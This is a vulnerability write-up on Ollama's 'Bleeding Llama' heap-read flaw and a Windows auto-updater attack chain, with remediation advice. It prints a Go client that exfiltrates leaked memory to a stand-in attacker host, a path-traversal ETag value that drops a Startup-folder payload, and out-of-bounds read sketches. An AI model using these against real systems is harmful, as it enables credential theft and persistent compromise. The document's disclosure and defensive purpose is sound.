Two separate security disclosures have hit the AI infrastructure community in quick succession, and neither is easy to brush off. Researchers have found multiple critical flaws in Ollama, the open source framework used by hundreds of thousands of developers and enterprises to run large language models on local hardware. One of the flaws, dubbed “Bleeding Llama,” lets an unauthenticated stranger drain your server’s process memory in three HTTP calls. The other, a Windows-specific update-chain attack, has been sitting unpatched for over 90 days.
If you’re running Ollama, the short version is: upgrade to v0.23.2 or later right now (the Bleeding Llama fix first shipped in v0.17.1), and if you’re on Windows, manually disable auto-updates until the vendor ships a fix.

What Is Ollama and Why Does This Matter?
Ollama is a popular open source framework that lets users run LLMs locally rather than through cloud APIs. On GitHub, the project has over 171,000 stars and more than 16,100 forks. With over 100 million Docker Hub downloads and wide enterprise adoption as a self-hosted AI inference engine, it has become the de facto standard for teams that want model inference on their own hardware.
The problem is that Ollama ships with no built-in authentication and, although it is designed for local use and binds to localhost by default, it is frequently reconfigured to listen on all network interfaces (0.0.0.0). The documented OLLAMA_HOST=0.0.0.0 setting is widely used in practice, with large public-internet exposure observed as a result, according to NVD. Roughly 300,000 Ollama servers are currently exposed on the public internet, with many more sitting on local networks with little isolation.
CVE-2026-7482 – “Bleeding Llama”
Background: How Ollama Creates Models from Files
To understand the vulnerability, you first need to understand the code path it lives in.
Creating model instances in Ollama can be done in one of two ways. The first is /api/pull, which downloads an existing model from the Ollama registry. The second is /api/create, which lets you build custom model instances by specifying configuration parameters like system prompts and quantization levels, either pulling from a remote registry or building from previously uploaded model files.
Files are uploaded to the Ollama server through the /api/blobs/sha256:[sha256-digest] endpoint. The SHA-256 digest is calculated from the file’s content, and the actual file content is sent in the HTTP body of the request.
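For concreteness, here is a minimal Go sketch of that upload contract against a local instance (model.gguf is a placeholder file name; this is illustrative, not Ollama client code):

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"fmt"
	"net/http"
	"os"
)

func main() {
	// The digest in the URL must match the SHA-256 of the request body,
	// which carries the raw file content.
	data, err := os.ReadFile("model.gguf")
	if err != nil {
		panic(err)
	}
	url := fmt.Sprintf("http://127.0.0.1:11434/api/blobs/sha256:%x",
		sha256.Sum256(data))
	resp, err := http.Post(url, "application/octet-stream", bytes.NewReader(data))
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	fmt.Println("upload:", resp.Status)
}
```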
What Is a GGUF File?
GGUF is a file format used to store large language models in a way that makes them efficient to load and run locally. A GGUF file contains tensors – multi-dimensional arrays of numbers representing the model’s learned parameters (weights). The header contains data describing the file: the version of the GGUF format, the number of tensors, and key-value metadata.
One metadata field worth noting is general.file_type, which determines how the numbers inside the tensors are stored. The two types relevant to this vulnerability are F16 (float-16) and F32 (float-32). After the header comes a list of tensor objects, each storing the tensor’s name, number of dimensions, data type, and an offset that points to where the actual tensor data lives in the file.
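As a rough sketch of that layout (simplified; the real GGUF spec has more fields and encodes strings with explicit length prefixes):

```go
// Simplified sketch of the GGUF layout described above, not the full spec.
type GGUFHeader struct {
	Magic       [4]byte // "GGUF"
	Version     uint32  // GGUF format version
	TensorCount uint64  // number of tensor entries that follow
	KVCount     uint64  // number of metadata key-value pairs
}

type TensorInfo struct {
	Name   string   // tensor name
	NDims  uint32   // number of dimensions
	Shape  []uint64 // one entry per dimension; element count is their product
	Dtype  uint32   // storage type, e.g. F32 or F16
	Offset uint64   // where the tensor data starts in the data section
}
```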
Quantization: What It Is and Why It Matters Here
Quantization reduces the precision of numbers stored in tensors, making the model smaller and faster to run at the cost of some accuracy. F32 stores each number in 4 bytes; F16 uses 2 bytes. Moving from F32 to F16 cuts memory usage in half but involves permanent data loss – some decimal precision is gone and can’t be recovered. Going the other direction, F16 to F32, involves no data loss at all. That last point is critical to how the exploit works.
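To make the asymmetry concrete, here is a minimal Go sketch of the half-to-single expansion (normal numbers only; subnormals, infinities, and NaNs are omitted for brevity; this is illustrative, not Ollama’s code). F16 is 1 sign + 5 exponent + 10 mantissa bits; F32 is 1 + 8 + 23, a strict superset, which is why widening loses nothing:

```go
package main

import (
	"fmt"
	"math"
)

// fp16ToFp32 expands an IEEE-754 half-precision value to single precision.
// Every fp16 exponent and mantissa fits inside the fp32 fields, so this
// direction is exact. Sketch for normal numbers only.
func fp16ToFp32(h uint16) float32 {
	sign := uint32(h>>15) & 1
	exp := uint32(h>>10) & 0x1f
	mant := uint32(h) & 0x3ff
	// Re-bias the exponent (fp16 bias 15 -> fp32 bias 127) and
	// left-align the 10-bit mantissa in the 23-bit field.
	bits := sign<<31 | (exp+112)<<23 | mant<<13
	return math.Float32frombits(bits)
}

func main() {
	// 0x3C00 is 1.0 in fp16; it expands to exactly 1.0 in fp32.
	fmt.Println(fp16ToFp32(0x3C00)) // 1
}
```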
The Unsafe Package: Go’s Security Escape Hatch
Go developers might wonder how an out-of-bounds memory vulnerability is even possible in a memory-safe language where the runtime would normally panic and crash. The answer is Go’s unsafe package, which acts as an escape hatch for low-level memory operations where all the usual safety guarantees are bypassed. Unsurprisingly, the one place Ollama uses unsafe is exactly where this vulnerability lives.
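A minimal illustration (not from Ollama’s source) of what unsafe permits:

```go
package main

import (
	"fmt"
	"unsafe"
)

func main() {
	buf := []byte{1, 2, 3, 4}
	// Reinterpret the 4-byte buffer as a slice of 1000 uint16s.
	// The Go runtime will not stop reads past the real allocation;
	// this is undefined behavior and may print adjacent heap bytes
	// or crash -- exactly the class of bug behind Bleeding Llama.
	p := (*uint16)(unsafe.Pointer(&buf[0]))
	oob := unsafe.Slice(p, 1000)
	fmt.Println(oob[500]) // reads far past the end of buf
}
```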
The Bug in WriteTo()
When /api/create processes a GGUF file, createModel is called to orchestrate model creation. If quantization is requested, a new layer is prepared by copying each tensor’s metadata (shape and type) while leaving the actual data out. Then WriteTo() is called for each tensor; this is the function responsible for the actual mathematical conversion from source type to destination type.
For optimization, WriteTo() first converts source data to F32, then from F32 to the destination format. By always going through F32 as a middle step, only two conversion functions are needed per format rather than a direct path between every possible pair. If the target type is already F32, the middle step simply copies the data directly.
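A sketch of that dispatch, where ConvertToF32 matches the name in the write-up but ConvertFromF32, TensorType, and f32ToBytes are hypothetical placeholders:

```go
// Two-stage conversion sketch (reconstruction, not Ollama's actual code).
// Each source type needs only a to-F32 routine and each destination type
// only a from-F32 routine, instead of one converter per (src, dst) pair.
func convert(src []byte, srcType, dstType TensorType, n uint64) []byte {
	f32buf := ConvertToF32(src, srcType, n) // stage 1: widen everything to F32
	if dstType == F32 {
		return f32ToBytes(f32buf) // target already F32: plain copy, no stage 2
	}
	return ConvertFromF32(f32buf, dstType) // stage 2: narrow to the target type
}
```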
Here is where it breaks. WriteTo() calls ConvertToF32 with three parameters: the original data buffer, the source type, and q.from.Elements(). The Elements() function returns the total number of elements in a tensor by multiplying its shape dimensions together – a tensor with shape (3, 3, 3) has 27 elements. ConvertToF32 then calls the appropriate conversion function based on the source type. If the source is F16, it calls ggml_fp16_to_fp32_row with a pointer to the original data, an output buffer, and the number of elements to read, which comes from Elements().
The problem: GGUF is just a binary format, and anyone can create one manually and set the tensor’s shape to any value. There is no validation that the number of elements about to be read actually matches the real size of the data. If an attacker sets a very large number in the shape field, the loop blindly reads past the end of the buffer. That is the out-of-bounds heap read.
So an attacker crafts a GGUF file where the tensor header declares a shape of, say, 1,000 × 1,000 × 1,000 elements (one billion), while the actual file data behind it is only a few bytes. The loop in ggml_fp16_to_fp32_row runs for a billion iterations starting at the buffer boundary, pulling whatever heap memory lies beyond it into the output buffer: other users’ conversation data, system prompt strings, environment variable contents.
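Here is a hedged reconstruction of that flawed path in Go. The function names loosely follow the write-up, the real Ollama source differs, and fp16ToFp32 refers to the earlier sketch:

```go
import "unsafe"

// elements mirrors the Elements() behavior described above: the product
// of the shape dimensions, taken straight from the attacker's GGUF header.
func elements(shape []uint64) uint64 {
	n := uint64(1)
	for _, d := range shape {
		n *= d // no sanity check against the actual data size
	}
	return n
}

func convertF16ToF32(data []byte, n uint64) []float32 {
	out := make([]float32, n)
	// n is trusted but never checked against len(data)/2. unsafe.Slice
	// happily builds a view far larger than the real allocation.
	src := unsafe.Slice((*uint16)(unsafe.Pointer(&data[0])), n)
	for i := range out {
		// Once i exceeds the real element count, src[i] reads adjacent
		// heap memory: the out-of-bounds read at the heart of the bug.
		out[i] = fp16ToFp32(src[i])
	}
	return out
}
```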
The Lossless Exfiltration Trick
This is where Cyera’s researchers found something genuinely inventive. Reading raw heap memory through most attack paths produces corrupted garbage, because lossy quantization destroys the byte patterns needed to reconstruct the original content.
To keep the leaked data intact, set the tensor type to F16 and request F32 as the target format. F16 to F32 is a lossless conversion – 2 bytes expand to 4 bytes with no information loss. Since the target is already F32, the second conversion stage does nothing at all. The data lands on disk exactly as it was in memory.
The result is a model artifact written to disk that contains the server’s heap memory, perfectly preserved and bit-for-bit readable.
Getting the Data Out: Abusing /api/push
At this point the stolen memory is sitting in a model file on the target server. The attacker still needs to retrieve it.
Ollama’s /api/push endpoint accepts a model name as a parameter and uploads the named model to a registry. The PushHandler function checks whether a model with that name exists on disk, then calls PushModel to handle the upload. PushModel parses the model name, and if the name looks like an HTTP URI, it pushes the entire model to that URI.
There is no validation preventing this. You can create a model via /api/create (with files) and give the model a name like http://attacker-server.com/namespace/model:tag, then call /api/push with that same name, and Ollama will upload the model – leaked heap data and all – straight to the attacker’s server.
The Full Three-Call Attack Chain
Put it all together and the attack is just this (a code sketch follows the list):
1. POST /api/blobs/sha256:[hash] – Upload the crafted GGUF file with a forged tensor shape declaring a huge element count (say, a billion) backed by only a few bytes of actual data.
2. POST /api/create – Trigger model creation with quantize=F32 and set the model name to a URI under attacker control (e.g., http://evil.example.com/org/stolen-model:latest). This fires WriteTo(), the out-of-bounds read happens, and the leaked heap memory lands in the new model artifact on disk.
3. POST /api/push – Push the resulting “model” to the attacker-controlled registry. Ollama faithfully uploads the artifact containing everything it just read from heap memory.
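For illustration, the chain fits in a few dozen lines of Go. The JSON field names below follow Ollama’s public API docs but should be treated as assumptions; victim and evil.example.com are placeholders:

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"fmt"
	"net/http"
	"os"
)

const target = "http://victim:11434" // hypothetical exposed instance

func post(path, contentType string, body []byte) {
	resp, err := http.Post(target+path, contentType, bytes.NewReader(body))
	if err != nil {
		panic(err)
	}
	resp.Body.Close()
	fmt.Println(path, "->", resp.Status)
}

func main() {
	// Call 1: upload the crafted GGUF with the forged tensor shape.
	gguf, _ := os.ReadFile("crafted.gguf")
	digest := fmt.Sprintf("sha256:%x", sha256.Sum256(gguf))
	post("/api/blobs/"+digest, "application/octet-stream", gguf)

	// Call 2: create a model from the blob with quantize=F32; the model
	// name doubles as the exfiltration URI.
	create := fmt.Sprintf(`{
		"model": "http://evil.example.com/org/stolen-model:latest",
		"files": {"crafted.gguf": "%s"},
		"quantize": "F32"
	}`, digest)
	post("/api/create", "application/json", []byte(create))

	// Call 3: push the poisoned artifact to the attacker's registry.
	post("/api/push", "application/json",
		[]byte(`{"model": "http://evil.example.com/org/stolen-model:latest"}`))
}
```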
The leaked data in practice contains user prompts, system prompts from other models loaded concurrently, and environment variables from the host machine, all exposed with just three API calls.
No credentials. No privilege escalation. No exploit code in the traditional sense – just HTTP requests, a hand-crafted binary file, and a server running Ollama.
What Actually Gets Stolen
In enterprise environments, leaked heap contents may include API keys, internal instructions, proprietary code, customer-related content, and other sensitive material processed by AI workflows. The risk compounds when Ollama is connected to external tools or coding assistants, because those outputs pass through memory and become part of what an attacker can extract.
In a large enterprise using Ollama as a shared inference service for thousands of employees, an attacker can harvest a broad cross-section of the organization’s secrets: API keys, proprietary code, customer contracts, and much more. Environment variables are particularly dangerous since they routinely carry cloud credentials like AWS_ACCESS_KEY_ID, GIT_TOKEN, or database connection strings.
CVE-2026-42248 and CVE-2026-42249 – The Windows Updater Chain
Still Unpatched
While Bleeding Llama has a fix available in v0.17.1, the Windows-specific attack chain from Striga and CERT Polska does not. The flaws were publicly disclosed on January 27, 2026, after a 90-day coordinated disclosure window elapsed without a vendor fix, and they remain unpatched.
How the Update Mechanism Works
The Windows desktop client auto-starts on login from the Windows Startup folder, listens on 127.0.0.1:11434, periodically polls for updates in the background via the /api/update endpoint, and applies any pending update on the next app start.
Two separate weaknesses in this pipeline, individually rated CVSS 7.7, chain into something considerably worse.
CVE-2026-42248: Missing Signature Verification
On Windows, the verifyDownload() function is a stub. It unconditionally returns nil (success) without performing any code-signing check. There is no cryptographic verification that a downloaded binary is legitimately signed by Ollama’s build infrastructure. The updater will accept any arbitrary PE binary handed to it as a valid update package.
This means that if an attacker can influence what the updater receives, through any network path, they win without needing the path traversal bug. The missing integrity check alone is sufficient for code execution if the attacker controls the update response.
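Based on the advisory’s description, the stub amounts to something like this reconstruction (the actual function in Ollama’s source may differ in signature and surroundings):

```go
// Reconstruction of the Windows stub described in the advisory.
func verifyDownload(path string) error {
	// No Authenticode check, no hash pinning, no signer allowlist:
	// every downloaded PE binary is treated as a valid update.
	return nil
}
```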
CVE-2026-42249: Path Traversal via Unsanitized ETag Headers
The updater constructs the local staging directory path for the installer using values taken directly from the ETag HTTP response header. ETag values are not sanitized before being used to build file paths. An attacker-controlled update server can supply an ETag like:
../../../../../../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
This redirects where the downloaded binary gets written, placing it directly into the Windows Startup folder.
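A sketch of the unsafe path construction, with an assumed staging-directory layout; the point is that filepath.Join resolves “..” lexically rather than containing the result:

```go
import (
	"os"
	"path/filepath"
)

// stagingPath sketches the flaw (reconstruction; directory names are
// assumptions). The ETag header value feeds straight into the on-disk
// path, and filepath.Join resolves ".." components lexically, so a
// crafted ETag walks the destination out of the staging directory --
// with the ETag shown above, the result lands in the Startup folder.
func stagingPath(etag string) string {
	stageDir := filepath.Join(os.Getenv("LOCALAPPDATA"), "Ollama", "updates")
	return filepath.Join(stageDir, etag) // no sanitization of etag
}
```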
Chaining for Persistent Execution
Combine the two. The attacker supplies a malicious PE binary as the “update payload” and a path-traversal ETag pointing to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\. With no signature check to fail, the file is written silently to Startup. To exploit the flaws, the attacker needs to control an update server reachable by the victim’s Ollama client. That is achievable by overriding OLLAMA_UPDATE_URL to point at a local server over plain HTTP, or through DNS hijacking or TLS interception on the network. The chain also requires AutoUpdateEnabled to be on, which is the default setting.
The update process runs silently in the background with no user notification. On next login, Windows executes the payload. The backdoor survives Ollama reinstalls because the malicious file lives in Startup independently of Ollama’s own installation directory.
Why Enterprise AI Is Particularly Exposed
The uncomfortable truth is that Ollama was never designed for how it’s actually deployed. It was built as a localhost tool, which is why it doesn’t include authentication. In practice, teams deploy it in containers, expose it to other services, or configure it to listen on all interfaces to support multi-client use.
Attackers with access to Ollama HTTP servers can already instruct them to pull or delete any AI model. The memory leak vulnerability takes that further, extracting secrets from the inference process itself.
The agentic pipeline angle is especially worth noting. Teams running Claude Code, LangChain, or custom orchestration layers routed through a local Ollama instance are pushing proprietary code, internal documentation, and API credentials through that server’s heap memory on every inference call.
Response Plan
Triage
Run ollama --version across every workstation and server. Anything below 0.17.1 is vulnerable to Bleeding Llama. Check the network binding with ss -tlnp | grep 11434; if Ollama is bound to 0.0.0.0, assume the worst. Run a Shodan query against your public IP ranges on port 11434.
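If you want to sweep internal ranges yourself, an unauthenticated probe against the documented /api/tags endpoint (which lists installed models and requires no credentials) is enough to flag exposed instances. A minimal sketch; host:port comes from your own inventory:

```go
package main

import (
	"fmt"
	"net/http"
	"os"
	"time"
)

func main() {
	host := os.Args[1] // e.g. 10.0.0.5:11434
	client := &http.Client{Timeout: 3 * time.Second}
	// Any 200 response means the API is reachable without credentials.
	resp, err := client.Get("http://" + host + "/api/tags")
	if err != nil {
		fmt.Println(host, "unreachable:", err)
		return
	}
	defer resp.Body.Close()
	if resp.StatusCode == http.StatusOK {
		fmt.Println(host, "EXPOSED: unauthenticated Ollama API reachable")
	} else {
		fmt.Println(host, "responded with", resp.Status)
	}
}
```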
Patch and Contain
Upgrade to v0.23.2 or the latest available release. Set the environment variable OLLAMA_HOST=127.0.0.1:11434 to prevent external network access. If remote access is genuinely required, put Ollama behind an authenticating reverse proxy (Nginx, Caddy) or an identity-aware gateway like Tailscale or Cloudflare Access.
If your Ollama instance was publicly accessible before the patch, assume potential compromise. Review what sensitive data may have been exposed and rotate all credentials. That means cloud provider keys, API tokens, registry credentials, and any secrets that could have lived in the environment of the host process.
Windows-Specific Hardening
Until Ollama ships fixes for CVE-2026-42248 and CVE-2026-42249:
Disable auto-updates in the Ollama tray settings. Remove any Startup entries:
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Ollama.lnk"
```
Do not re-enable auto-updates until signature verification is actually implemented. Monitor the official Ollama GitHub releases page directly and update manually by downloading installers from it.
Frequently Asked Questions
Q: My Ollama instance runs in Docker. Am I safe?
No. Docker isolation doesn’t protect against Bleeding Llama. The vulnerability leaks memory from within the Ollama process itself. If the container’s port 11434 is reachable from the network, or from other containers on the same host, the attack works fine. Container boundaries are irrelevant here.
Q: Will my EDR catch this?
Probably not for the memory leak. The out-of-bounds read happens inside a completely legitimate code path of the Ollama process. No shellcode, no unusual syscalls, nothing a typical behavioral EDR signature would flag. The Windows RCE payload might get caught when it executes on login, depending on what it does, but by then the persistence is already in place.
Q: Can I add authentication to Ollama itself?
No. Ollama provides no built-in authentication. It is the operator’s responsibility to provide an authentication layer using external tools like Nginx, Caddy, or enterprise identity providers.
The Bigger Picture
The “Bleeding Llama” incident isn’t just an Ollama problem. It’s a preview of what happens when infrastructure outpaces its own security model. Ollama succeeded at making local AI inference easy. But “easy for localhost use” and “safe for multi-user enterprise deployment” were never the same requirement, and the gap between them is where these vulnerabilities live.
The general advice from security researchers applies to the entire AI framework ecosystem, which is increasingly targeted: deploy an authentication proxy in front of all Ollama instances, never expose them to the internet without IP filtering and firewalls, and isolate local-network instances on secure network segments.
AI runtimes deserve the same network paranoia that legacy unauthenticated databases once demanded. The attack surface is real, the exposure numbers are large, and the data sitting in inference server memory is often exactly what an adversary would pay for.